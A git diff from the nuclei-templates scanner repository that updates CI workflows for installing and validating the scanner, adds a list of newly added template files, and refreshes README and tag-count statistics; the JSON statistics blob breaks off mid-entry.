diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 3bab5e61f1..49d24413a8 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -58,6 +58,8 @@ We have also added a set of templates to help you understand how things work. Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. +![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image") + 💬 Discussion ----- diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index bb4faf2ec2..1253309751 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -10,23 +10,25 @@ jobs: docs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master - with: - persist-credentials: false - fetch-depth: 0 - token: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v2 - - uses: actions/setup-go@v2 - with: - go-version: 1.17 + - name: Get Github tag + id: meta + run: | + echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)" + + - name: Setup CVE annotate + if: steps.meta.outputs.tag != '' + env: + VERSION: ${{ steps.meta.outputs.tag }} + run: | + wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip + sudo unzip cve-annotate.zip -d /usr/local/bin + working-directory: /tmp - name: Generate CVE Annotations id: cve-annotate run: | - if ! which cve-annotate > /dev/null; then - echo -e "Command cve-annotate not found! Installing\c" - go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev - fi cve-annotate -i ./cves/ -d . echo "::set-output name=changes::$(git status -s | wc -l)" @@ -35,6 +37,7 @@ jobs: run: | git config --local user.email "action@github.com" git config --local user.name "GitHub Action" + git pull git add cves git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a @@ -43,4 +46,4 @@ jobs: uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} - branch: ${{ github.ref }} + branch: ${{ github.ref }} \ No newline at end of file diff --git a/.github/workflows/new-templates.yml b/.github/workflows/new-templates.yml new file mode 100644 index 0000000000..fa398b097e --- /dev/null +++ b/.github/workflows/new-templates.yml @@ -0,0 +1,37 @@ +name: 🥳 New Template List + +on: + push: + branches: + - master + workflow_dispatch: + +jobs: + templates: + runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' + steps: + - uses: actions/checkout@master + with: + token: ${{ secrets.GITHUB_TOKEN }} + persist-credentials: false + fetch-depth: 0 + + - name: Generate new template list + id: new-additions + run: | + git pull + git diff --name-only --diff-filter=A $(git tag | tail -n 1) @ . | grep .yaml | tee .new-additions + + - name: Commit files + run: | + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git add .new-additions -f + git commit --allow-empty -m "Auto Generated New Template Addition List [$(date)] :robot:" -a + + - name: Push changes + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + branch: ${{ github.ref }} diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml new file mode 100644 index 0000000000..19f985b0c9 --- /dev/null +++ b/.github/workflows/template-db-indexer.yml @@ -0,0 +1,29 @@ +name: 📑 Template-DB Indexer + +on: + push: + branches: + - master + workflow_dispatch: + +jobs: + index: + runs-on: ubuntu-latest + steps: + - uses: actions/setup-go@v2 + with: + go-version: 1.17 + + - name: Intalling Indexer + run: | + git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github + git clone https://github.com/projectdiscovery/nucleish-api.git + cd nucleish-api/cmd/generate-index/ + go install + + - name: Generate Index + env: + AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }} + AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }} + run: | + generate-index -mode templates \ No newline at end of file diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 33e2653241..4107c2edcc 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -6,24 +6,24 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master - - uses: actions/setup-go@v2 - with: - go-version: 1.17 + - uses: actions/checkout@v2 - - name: Cache Go - id: cache-go - uses: actions/cache@v2 - with: - path: /home/runner/go - key: ${{ runner.os }}-go - - - name: Installing Nuclei - if: steps.cache-go.outputs.cache-hit != 'true' + - name: Get Github tag + id: meta run: | - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest + echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)" + + - name: Setup Nuclei + if: steps.meta.outputs.tag != '' + env: + VERSION: ${{ steps.meta.outputs.tag }} + run: | + wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip + sudo unzip nuclei*.zip -d /usr/local/bin + working-directory: /tmp - name: Template Validation run: | + cp -r ${{ github.workspace }} $HOME nuclei -validate -t . nuclei -validate -w ./workflows \ No newline at end of file diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index ae4e49a7b8..ff91ce30ed 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,6 +1,9 @@ name: 🗒 Templates Stats on: + push: + tags: + - '*' workflow_dispatch: jobs: @@ -49,4 +52,4 @@ jobs: uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} - branch: ${{ github.ref }} \ No newline at end of file + branch: master \ No newline at end of file diff --git a/.new-additions b/.new-additions new file mode 100644 index 0000000000..646fa8d459 --- /dev/null +++ b/.new-additions @@ -0,0 +1,14 @@ +cves/2013/CVE-2013-6281.yaml +cves/2018/CVE-2018-18608.yaml +cves/2019/CVE-2019-18371.yaml +cves/2021/CVE-2021-45428.yaml +cves/2022/CVE-2022-0346.yaml +cves/2022/CVE-2022-21500.yaml +exposed-panels/jupyter-notebook.yaml +exposed-panels/looker-panel.yaml +exposures/files/xampp-environment-variables.yaml +miscellaneous/robots-txt-endpoint.yaml +ssl/self-signed-ssl.yaml +token-spray/api-debounce.yaml +token-spray/api-tatum.yaml +vulnerabilities/dedecms/dedecms-config-xss.yaml diff --git a/.nuclei-ignore b/.nuclei-ignore index bef00b4d7a..832ecac550 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -7,10 +7,12 @@ # tags is a list of tags to ignore execution for # unless asked for by the user. -tags: +tags: - "fuzz" - "dos" - - "misc" # files is a list of files to ignore template execution # unless asked for by the user. + +# files: +# - cves/2020/CVE-2020-35489.yaml diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 64b9408cf0..ccc3257d16 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -60,7 +60,7 @@ git add . git commit -m "Added/Fixed/Updated XXX Template" ``` -**NOTE**: +**NOTE**: - A Pull Request should have only one unique template to make it simple for review. - Multiple templates for same technology can be grouped into single Pull Request. diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md index e2ad854090..4afd08ad18 100644 --- a/PULL_REQUEST_TEMPLATE.md +++ b/PULL_REQUEST_TEMPLATE.md @@ -24,5 +24,5 @@ I've validated this template locally? - [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/) - [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) -- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md) +- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md) - [PD-Community Discord server](https://discord.gg/projectdiscovery) \ No newline at end of file diff --git a/README.md b/README.md index d7f5cd6a7a..8274ffaff9 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 907 | dhiyaneshdk | 338 | cves | 913 | info | 903 | http | 2477 | -| lfi | 377 | daffainfo | 333 | vulnerabilities | 347 | high | 691 | file | 57 | -| panel | 318 | pikpikcu | 286 | exposed-panels | 318 | medium | 516 | network | 47 | -| xss | 283 | pdteam | 216 | technologies | 220 | critical | 322 | dns | 12 | -| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | | -| exposure | 250 | dwisiswant0 | 156 | misconfiguration | 163 | | | | | -| rce | 230 | pussycat0x | 90 | token-spray | 127 | | | | | -| tech | 223 | gy741 | 88 | takeovers | 65 | | | | | -| cve2021 | 188 | 0x_akoko | 76 | default-logins | 63 | | | | | -| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | | +| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 | +| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 | +| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 | +| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 | +| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | | +| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | +| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | | +| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | | +| tech | 272 | gy741 | 119 | default-logins | 96 | | | | | +| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | | -**190 directories, 2663 files**. +**262 directories, 3566 files**. @@ -71,6 +71,8 @@ We have also added a set of templates to help you understand how things work. Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. +![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image") + 💬 Discussion ----- diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 215b5d9e4a..96176976a3 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":907},{"name":"lfi","count":377},{"name":"panel","count":318},{"name":"xss","count":283},{"name":"wordpress","count":270},{"name":"exposure","count":250},{"name":"rce","count":230},{"name":"tech","count":223},{"name":"cve2021","count":188},{"name":"wp-plugin","count":186},{"name":"cve2020","count":171},{"name":"joomla","count":128},{"name":"token-spray","count":127},{"name":"cve2010","count":109},{"name":"cve2019","count":106},{"name":"cve2018","count":101},{"name":"config","count":100},{"name":"iot","count":84},{"name":"oast","count":80},{"name":"apache","count":80},{"name":"default-login","count":71},{"name":"takeover","count":69},{"name":"token","count":68},{"name":"file","count":57},{"name":"unauth","count":57},{"name":"cve2017","count":56},{"name":"ssrf","count":47},{"name":"sqli","count":46},{"name":"network","count":45},{"name":"","count":44},{"name":"oracle","count":41},{"name":"misconfig","count":41},{"name":"cve2016","count":40},{"name":"redirect","count":38},{"name":"logs","count":34},{"name":"cve2015","count":31},{"name":"google","count":31},{"name":"jira","count":30},{"name":"cisco","count":29},{"name":"atlassian","count":29},{"name":"listing","count":29},{"name":"cve2014","count":28},{"name":"auth-bypass","count":27},{"name":"router","count":26},{"name":"generic","count":24},{"name":"disclosure","count":22},{"name":"misc","count":21},{"name":"aem","count":20},{"name":"cve2012","count":19},{"name":"debug","count":19},{"name":"login","count":19},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"php","count":16},{"name":"wp-theme","count":16},{"name":"weblogic","count":16},{"name":"aws","count":15},{"name":"cve2011","count":15},{"name":"fuzz","count":15},{"name":"devops","count":15},{"name":"deserialization","count":14},{"name":"struts","count":14},{"name":"cve2009","count":14},{"name":"adobe","count":14},{"name":"dns","count":13},{"name":"intrusive","count":13},{"name":"dlink","count":13},{"name":"android","count":13},{"name":"manageengine","count":12},{"name":"zoho","count":12},{"name":"xxe","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"hp","count":11},{"name":"ibm","count":11},{"name":"magento","count":11},{"name":"microsoft","count":11},{"name":"dell","count":10},{"name":"cve2008","count":9},{"name":"fastjson","count":9},{"name":"gitlab","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"cms","count":9},{"name":"airflow","count":9},{"name":"kubernetes","count":9},{"name":"rails","count":9},{"name":"fileupload","count":9},{"name":"cnvd","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"ruijie","count":8},{"name":"backup","count":8},{"name":"netgear","count":8},{"name":"coldfusion","count":8},{"name":"files","count":7},{"name":"solr","count":7},{"name":"confluence","count":7},{"name":"prometheus","count":7},{"name":"camera","count":7},{"name":"django","count":7},{"name":"jetty","count":6},{"name":"sitecore","count":6},{"name":"go","count":6},{"name":"drupal","count":6},{"name":"glpi","count":6},{"name":"squirrelmail","count":6},{"name":"api","count":6},{"name":"lucee","count":6},{"name":"laravel","count":6},{"name":"nodejs","count":6},{"name":"jolokia","count":6},{"name":"grafana","count":6},{"name":"windows","count":6},{"name":"docker","count":6},{"name":"rconfig","count":6},{"name":"phpmyadmin","count":6},{"name":"citrix","count":6},{"name":"iis","count":5},{"name":"wso2","count":5},{"name":"headless","count":5},{"name":"printer","count":5},{"name":"gocd","count":5},{"name":"crlf","count":5},{"name":"tomcat","count":5},{"name":"minio","count":5},{"name":"fatpipe","count":5},{"name":"symfony","count":5},{"name":"ssti","count":5},{"name":"thinkphp","count":5},{"name":"dedecms","count":5},{"name":"exchange","count":5},{"name":"java","count":5},{"name":"git","count":5},{"name":"circarlife","count":5},{"name":"hongdian","count":4},{"name":"vpn","count":4},{"name":"symantec","count":4},{"name":"artifactory","count":4},{"name":"buffalo","count":4},{"name":"webserver","count":4},{"name":"proxy","count":4},{"name":"zabbix","count":4},{"name":"rfi","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"microstrategy","count":4},{"name":"asp","count":4},{"name":"opensis","count":4},{"name":"firebase","count":4},{"name":"slack","count":4},{"name":"enum","count":4},{"name":"zimbra","count":4},{"name":"moodle","count":4},{"name":"panos","count":4},{"name":"magmi","count":4},{"name":"keycloak","count":4},{"name":"bigip","count":4},{"name":"amazon","count":4},{"name":"cve2007","count":4},{"name":"npm","count":4},{"name":"jellyfin","count":4},{"name":"strapi","count":4},{"name":"samsung","count":4},{"name":"elastic","count":4},{"name":"solarwinds","count":4},{"name":"firmware","count":4},{"name":"wcs","count":4},{"name":"resin","count":4},{"name":"maps","count":4},{"name":"zhiyuan","count":3},{"name":"caucho","count":3},{"name":"github","count":3},{"name":"smtp","count":3},{"name":"sql","count":3},{"name":"vbulletin","count":3},{"name":"kafka","count":3},{"name":"itop","count":3},{"name":"sonicwall","count":3},{"name":"ebs","count":3},{"name":"linkerd","count":3},{"name":"db","count":3},{"name":"hashicorp","count":3},{"name":"ssh","count":3},{"name":"nexus","count":3},{"name":"backdoor","count":3},{"name":"telerik","count":3},{"name":"terramaster","count":3},{"name":"smb","count":3},{"name":"hoteldruid","count":3},{"name":"search","count":3},{"name":"injection","count":3},{"name":"mail","count":3},{"name":"activemq","count":3},{"name":"axigen","count":3},{"name":"azure","count":3},{"name":"tikiwiki","count":3},{"name":"httpd","count":3},{"name":"lansweeper","count":3},{"name":"log","count":3},{"name":"movable","count":3},{"name":"nacos","count":3},{"name":"springcloud","count":3},{"name":"cacti","count":3},{"name":"fpd","count":3},{"name":"openam","count":3},{"name":"ampps","count":3},{"name":"cloud","count":3},{"name":"exposures","count":3},{"name":"pentaho","count":3},{"name":"kibana","count":3},{"name":"r-seenet","count":3},{"name":"jeesns","count":3},{"name":"targa","count":3},{"name":"druid","count":3},{"name":"oa","count":3},{"name":"bitrix","count":3},{"name":"node","count":3},{"name":"cves","count":3},{"name":"icewarp","count":3},{"name":"spring","count":3},{"name":"lfr","count":3},{"name":"ofbiz","count":3},{"name":"kevinlab","count":3},{"name":"gogs","count":3},{"name":"openssh","count":3},{"name":"mongodb","count":3},{"name":"nosqli","count":3},{"name":"fanruan","count":3},{"name":"globalprotect","count":2},{"name":"liferay","count":2},{"name":"jetbrains","count":2},{"name":"hasura","count":2},{"name":"trixbox","count":2},{"name":"service","count":2},{"name":"mida","count":2},{"name":"upload","count":2},{"name":"idrac","count":2},{"name":"bypass","count":2},{"name":"bucket","count":2},{"name":"synology","count":2},{"name":"prtg","count":2},{"name":"guacamole","count":2},{"name":"odoo","count":2},{"name":"maian","count":2},{"name":"status","count":2},{"name":"jsf","count":2},{"name":"frontpage","count":2},{"name":"spark","count":2},{"name":"rocketchat","count":2},{"name":"linksys","count":2},{"name":"dolibarr","count":2},{"name":"chyrp","count":2},{"name":"glassfish","count":2},{"name":"openvpn","count":2},{"name":"cache","count":2},{"name":"places","count":2},{"name":"qcubed","count":2},{"name":"openfire","count":2},{"name":"cve2005","count":2},{"name":"idea","count":2},{"name":"bitly","count":2},{"name":"phpcollab","count":2},{"name":"yapi","count":2},{"name":"ems","count":2},{"name":"getsimple","count":2},{"name":"rstudio","count":2},{"name":"sharepoint","count":2},{"name":"grav","count":2},{"name":"aruba","count":2},{"name":"geowebserver","count":2},{"name":"zeroshell","count":2},{"name":"myfactory","count":2},{"name":"prestashop","count":2},{"name":"pega","count":2},{"name":"waf","count":2},{"name":"dos","count":2},{"name":"kong","count":2},{"name":"axis2","count":2},{"name":"showdoc","count":2},{"name":"akamai","count":2},{"name":"graphql","count":2},{"name":"fortinet","count":2},{"name":"qihang","count":2},{"name":"nextjs","count":2},{"name":"jboss","count":2},{"name":"ec2","count":2},{"name":"totemomail","count":2},{"name":"gitea","count":2},{"name":"metabase","count":2},{"name":"linux","count":2},{"name":"bruteforce","count":2},{"name":"cve2006","count":2},{"name":"axis","count":2},{"name":"plesk","count":2},{"name":"netsweeper","count":2},{"name":"avantfax","count":2},{"name":"mailchimp","count":2},{"name":"igs","count":2},{"name":"tidb","count":2},{"name":"ruby","count":2},{"name":"wuzhicms","count":2},{"name":"ilo","count":2},{"name":"forcepoint","count":2},{"name":"linkedin","count":2},{"name":"phpstorm","count":2},{"name":"xxljob","count":2},{"name":"s3","count":2},{"name":"yii","count":2},{"name":"harbor","count":2},{"name":"commax","count":2},{"name":"influxdb","count":2},{"name":"rockmongo","count":2},{"name":"voipmonitor","count":2},{"name":"text","count":2},{"name":"middleware","count":2},{"name":"rancher","count":2},{"name":"chamilo","count":2},{"name":"redis","count":2},{"name":"wordfence","count":2},{"name":"justwriting","count":2},{"name":"aviatrix","count":2},{"name":"vcenter","count":2},{"name":"sonarqube","count":2},{"name":"ecology","count":2},{"name":"shellshock","count":2},{"name":"payara","count":2},{"name":"nextcloud","count":2},{"name":"python","count":2},{"name":"favicon","count":2},{"name":"splunk","count":2},{"name":"ad","count":2},{"name":"resourcespace","count":2},{"name":"electron","count":2},{"name":"webcam","count":2},{"name":"pgadmin","count":2},{"name":"mcafee","count":2},{"name":"embed","count":2},{"name":"frp","count":2},{"name":"aspose","count":2},{"name":"rackstation","count":2},{"name":"lotus","count":2},{"name":"emerge","count":2},{"name":"netis","count":2},{"name":"openemr","count":2},{"name":"chiyu","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"seeyon","count":2},{"name":"huawei","count":2},{"name":"couchdb","count":2},{"name":"fortios","count":2},{"name":"gitlist","count":2},{"name":"vrealize","count":2},{"name":"saltstack","count":2},{"name":"hpe","count":2},{"name":"heroku","count":2},{"name":"rosariosis","count":2},{"name":"flir","count":2},{"name":"ecoa","count":2},{"name":"hostheader-injection","count":2},{"name":"ucmdb","count":2},{"name":"neos","count":2},{"name":"backups","count":2},{"name":"centos","count":2},{"name":"nagios","count":2},{"name":"hjtcloud","count":2},{"name":"horde","count":2},{"name":"adminer","count":2},{"name":"kentico","count":2},{"name":"hikvision","count":2},{"name":"leak","count":2},{"name":"natshell","count":2},{"name":"akkadian","count":2},{"name":"storage","count":2},{"name":"asana","count":1},{"name":"nerdgraph","count":1},{"name":"node-red-dashboard","count":1},{"name":"doh","count":1},{"name":"smartsense","count":1},{"name":"spinnaker","count":1},{"name":"elasticsearch","count":1},{"name":"twitter-server","count":1},{"name":"spotify","count":1},{"name":"place","count":1},{"name":"jmx","count":1},{"name":"dwr","count":1},{"name":"elascticsearch","count":1},{"name":"accuweather","count":1},{"name":"digitalocean","count":1},{"name":"abuseipdb","count":1},{"name":"wifisky","count":1},{"name":"mod-proxy","count":1},{"name":"blackboard","count":1},{"name":"scs","count":1},{"name":"csrfguard","count":1},{"name":"sgp","count":1},{"name":"logontracer","count":1},{"name":"raspap","count":1},{"name":"cloudron","count":1},{"name":"buttercms","count":1},{"name":"timezone","count":1},{"name":"tieline","count":1},{"name":"openrestry","count":1},{"name":"dompdf","count":1},{"name":"gsoap","count":1},{"name":"skywalking","count":1},{"name":"lokalise","count":1},{"name":"wordcloud","count":1},{"name":"covalent","count":1},{"name":"speed","count":1},{"name":"seeddms","count":1},{"name":"actuator","count":1},{"name":"zenario","count":1},{"name":"graph","count":1},{"name":"yachtcontrol","count":1},{"name":"calendly","count":1},{"name":"biometrics","count":1},{"name":"ricoh","count":1},{"name":"nps","count":1},{"name":"softaculous","count":1},{"name":"cliniccases","count":1},{"name":"opensmtpd","count":1},{"name":"feifeicms","count":1},{"name":"edgeos","count":1},{"name":"okiko","count":1},{"name":"whm","count":1},{"name":"solman","count":1},{"name":"sprintful","count":1},{"name":"jabber","count":1},{"name":"natemail","count":1},{"name":"phalcon","count":1},{"name":"tika","count":1},{"name":"mapbox","count":1},{"name":"dribbble","count":1},{"name":"imap","count":1},{"name":"zcms","count":1},{"name":"iterable","count":1},{"name":"ntopng","count":1},{"name":"jumpcloud","count":1},{"name":"bash","count":1},{"name":"expressjs","count":1},{"name":"solarlog","count":1},{"name":"ns","count":1},{"name":"nifi","count":1},{"name":"zte","count":1},{"name":"tcexam","count":1},{"name":"thecatapi","count":1},{"name":"strava","count":1},{"name":"vsphere","count":1},{"name":"expn","count":1},{"name":"weather","count":1},{"name":"shopizer","count":1},{"name":"supervisor","count":1},{"name":"xml","count":1},{"name":"empirecms","count":1},{"name":"webui","count":1},{"name":"myanimelist","count":1},{"name":"thinkadmin","count":1},{"name":"redmine","count":1},{"name":"zend","count":1},{"name":"loytec","count":1},{"name":"pagespeed","count":1},{"name":"circle","count":1},{"name":"stem","count":1},{"name":"scimono","count":1},{"name":"rhymix","count":1},{"name":"wakatime","count":1},{"name":"sureline","count":1},{"name":"adiscon","count":1},{"name":"openx","count":1},{"name":"memcached","count":1},{"name":"varnish","count":1},{"name":"secmail","count":1},{"name":"mirai","count":1},{"name":"livezilla","count":1},{"name":"tarantella","count":1},{"name":"woocommerce","count":1},{"name":"pulsesecure","count":1},{"name":"maxsite","count":1},{"name":"phpfastcache","count":1},{"name":"scanii","count":1},{"name":"xiuno","count":1},{"name":"starttls","count":1},{"name":"ambari","count":1},{"name":"wondercms","count":1},{"name":"jwt","count":1},{"name":"allied","count":1},{"name":"autocomplete","count":1},{"name":"oneblog","count":1},{"name":"processmaker","count":1},{"name":"blind","count":1},{"name":"wiki","count":1},{"name":"craftcms","count":1},{"name":"binance","count":1},{"name":"cofax","count":1},{"name":"calendarix","count":1},{"name":"email","count":1},{"name":"wazuh","count":1},{"name":"cloudflare","count":1},{"name":"tapestry","count":1},{"name":"mariadb","count":1},{"name":"leanix","count":1},{"name":"bullwark","count":1},{"name":"k8","count":1},{"name":"chevereto","count":1},{"name":"locations","count":1},{"name":"svnserve","count":1},{"name":"pmb","count":1},{"name":"landray","count":1},{"name":"chinaunicom","count":1},{"name":"fiori","count":1},{"name":"lighttpd","count":1},{"name":"mobileiron","count":1},{"name":"accela","count":1},{"name":"circleci","count":1},{"name":"shenyu","count":1},{"name":"nownodes","count":1},{"name":"plastic","count":1},{"name":"cooperhewitt","count":1},{"name":"stripe","count":1},{"name":"smi","count":1},{"name":"flexbe","count":1},{"name":"umbraco","count":1},{"name":"skycaiji","count":1},{"name":"spip","count":1},{"name":"tink","count":1},{"name":"synnefo","count":1},{"name":"csod","count":1},{"name":"plc","count":1},{"name":"rijksmuseum","count":1},{"name":"visualtools","count":1},{"name":"lanproxy","count":1},{"name":"azkaban","count":1},{"name":"svn","count":1},{"name":"javamelody","count":1},{"name":"deviantart","count":1},{"name":"shadoweb","count":1},{"name":"adoptapet","count":1},{"name":"sar2html","count":1},{"name":"duomicms","count":1},{"name":"servicedesk","count":1},{"name":"olivetti","count":1},{"name":"alienvault","count":1},{"name":"zmanda","count":1},{"name":"redwood","count":1},{"name":"st","count":1},{"name":"oscommerce","count":1},{"name":"mantisbt","count":1},{"name":"adb","count":1},{"name":"bedita","count":1},{"name":"terraform","count":1},{"name":"froxlor","count":1},{"name":"traefik","count":1},{"name":"ssl","count":1},{"name":"appveyor","count":1},{"name":"wix","count":1},{"name":"exacqvision","count":1},{"name":"nc2","count":1},{"name":"metinfo","count":1},{"name":"tensorflow","count":1},{"name":"postgres","count":1},{"name":"cherokee","count":1},{"name":"cve2000","count":1},{"name":"netgenie","count":1},{"name":"viewpoint","count":1},{"name":"beanshell","count":1},{"name":"myucms","count":1},{"name":"tensorboard","count":1},{"name":"setup","count":1},{"name":"instatus","count":1},{"name":"tor","count":1},{"name":"primetek","count":1},{"name":"nexusdb","count":1},{"name":"vsftpd","count":1},{"name":"interlib","count":1},{"name":"achecker","count":1},{"name":"seacms","count":1},{"name":"catfishcms","count":1},{"name":"playable","count":1},{"name":"nomad","count":1},{"name":"dropbox","count":1},{"name":"cobub","count":1},{"name":"visualstudio","count":1},{"name":"netlify","count":1},{"name":"pyramid","count":1},{"name":"postmark","count":1},{"name":"springframework","count":1},{"name":"cve2004","count":1},{"name":"minimouse","count":1},{"name":"k8s","count":1},{"name":"bitquery","count":1},{"name":"cve2002","count":1},{"name":"onelogin","count":1},{"name":"find","count":1},{"name":"rsyncd","count":1},{"name":"wp","count":1},{"name":"ioncube","count":1},{"name":"htmli","count":1},{"name":"tileserver","count":1},{"name":"harvardart","count":1},{"name":"moinmoin","count":1},{"name":"cerebro","count":1},{"name":"trane","count":1},{"name":"esmtp","count":1},{"name":"weiphp","count":1},{"name":"ruckus","count":1},{"name":"lg-nas","count":1},{"name":"elevation","count":1},{"name":"fontawesome","count":1},{"name":"viewlinc","count":1},{"name":"twitter","count":1},{"name":"optimizely","count":1},{"name":"geocode","count":1},{"name":"totaljs","count":1},{"name":"glances","count":1},{"name":"fastcgi","count":1},{"name":"gloo","count":1},{"name":"expose","count":1},{"name":"opensns","count":1},{"name":"eyou","count":1},{"name":"revslider","count":1},{"name":"monitorr","count":1},{"name":"smartsheet","count":1},{"name":"ipvpn","count":1},{"name":"timeclock","count":1},{"name":"discourse","count":1},{"name":"couchbase","count":1},{"name":"mongo","count":1},{"name":"panasonic","count":1},{"name":"mara","count":1},{"name":"wmt","count":1},{"name":"clink-office","count":1},{"name":"redcap","count":1},{"name":"glowroot","count":1},{"name":"geolocation","count":1},{"name":"graphiql","count":1},{"name":"sidekiq","count":1},{"name":"pendo","count":1},{"name":"xmpp","count":1},{"name":"zookeeper","count":1},{"name":"burp","count":1},{"name":"ebird","count":1},{"name":"owasp","count":1},{"name":"okta","count":1},{"name":"kerio","count":1},{"name":"nordex","count":1},{"name":"csrf","count":1},{"name":"bingmaps","count":1},{"name":"api-manager","count":1},{"name":"optiLink","count":1},{"name":"circontrol","count":1},{"name":"charity","count":1},{"name":"oidc","count":1},{"name":"nsasg","count":1},{"name":"sophos","count":1},{"name":"socomec","count":1},{"name":"octobercms","count":1},{"name":"shopxo","count":1},{"name":"mantis","count":1},{"name":"avalanche","count":1},{"name":"directions","count":1},{"name":"dnssec","count":1},{"name":"bible","count":1},{"name":"micro-user-service","count":1},{"name":"phabricator","count":1},{"name":"alibaba","count":1},{"name":"mautic","count":1},{"name":"gilacms","count":1},{"name":"ipstack","count":1},{"name":"rmi","count":1},{"name":"instagram","count":1},{"name":"etherpad","count":1},{"name":"drone","count":1},{"name":"ssltls","count":1},{"name":"nette","count":1},{"name":"phpshowtime","count":1},{"name":"zyxel","count":1},{"name":"cybrotech","count":1},{"name":"vanguard","count":1},{"name":"ilo4","count":1},{"name":"postmessage","count":1},{"name":"tugboat","count":1},{"name":"clockwork","count":1},{"name":"tectuus","count":1},{"name":"sceditor","count":1},{"name":"webmodule-ee","count":1},{"name":"fedora","count":1},{"name":"74cms","count":1},{"name":"krweb","count":1},{"name":"exponentcms","count":1},{"name":"appweb","count":1},{"name":"vnc","count":1},{"name":"sarg","count":1},{"name":"servicenow","count":1},{"name":"portainer","count":1},{"name":"episerver","count":1},{"name":"visionhub","count":1},{"name":"lumis","count":1},{"name":"qvisdvr","count":1},{"name":"etherscan","count":1},{"name":"powercreator","count":1},{"name":"tpshop","count":1},{"name":"sentry","count":1},{"name":"huijietong","count":1},{"name":"realteo","c